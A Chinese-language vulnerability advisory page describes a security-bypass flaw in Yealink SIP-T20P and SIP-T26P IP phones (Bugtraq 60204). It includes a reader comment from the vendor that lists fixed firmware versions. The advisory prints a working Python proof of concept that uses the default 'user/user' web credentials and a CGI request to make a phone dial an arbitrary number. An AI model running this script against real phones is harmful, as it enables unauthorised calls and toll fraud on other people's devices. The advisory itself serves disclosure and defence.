发布日期:2013-05-29
更新日期:2013-05-30受影响系统:
yealink Yealink SIP-T20P IP Phone
yealink SIP-T26P
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60204
YeaLink IP Phone SIP-T20P、SIP-T26P是企业级HD IP电话。
YeaLink IP Phone SIP-T20P、SIP-T26P在实现上存在安全绕过漏洞,攻击者可利用此漏洞绕过某些安全限制并执行未授权操作。
<*来源:b0hr
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
import urllib2, sys
print "
YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28
" if (len(sys.argv) != 3):
print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789
"
exit(0)
IP = sys.argv[1]
num = sys.argv[2]
UrlGet_params = "http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738" % (IP, num)
webU = "user"
webP = "user" query = urllib2.HTTPPasswordMgrWithDefaultRealm()
query.add_password(None, UrlGet_params, webU, webP)
auth = urllib2.HTTPBasicAuthHandler(query)
log = urllib2.build_opener(auth)
urllib2.install_opener(log) queryPag = urllib2.urlopen(UrlGet_params) print "
Call to %s form IP phone %s
" %(num,IP)建议:
--------------------------------------------------------------------------------
厂商补丁:
yealink
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://yealink.comRails 框架遭受持续不断的攻击波TP-LINK IP Cameras硬编码凭证安全绕过漏洞(CVE-2013-2572)相关资讯 YeaLink IP Phone 本文评论 查看全部评论 (2)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
| |
第 2 楼 Yealink 发表于 2013/7/1 8:52:19Yealink已在新版本中解决上述问题
SIP-T20P请更新至9.70.0.140地址:http://www.yealink.com/SupportDownloadfiles_detail.aspx?ProductsID=64&CateID=187&flag=142
SIP-T26P请更新至6.70.0.140地址:http://www.yealink.com/SupportDownloadfiles_detail.aspx?ProductsID=62&CateID=185&flag=142回复 支持 (0) 反对 (0)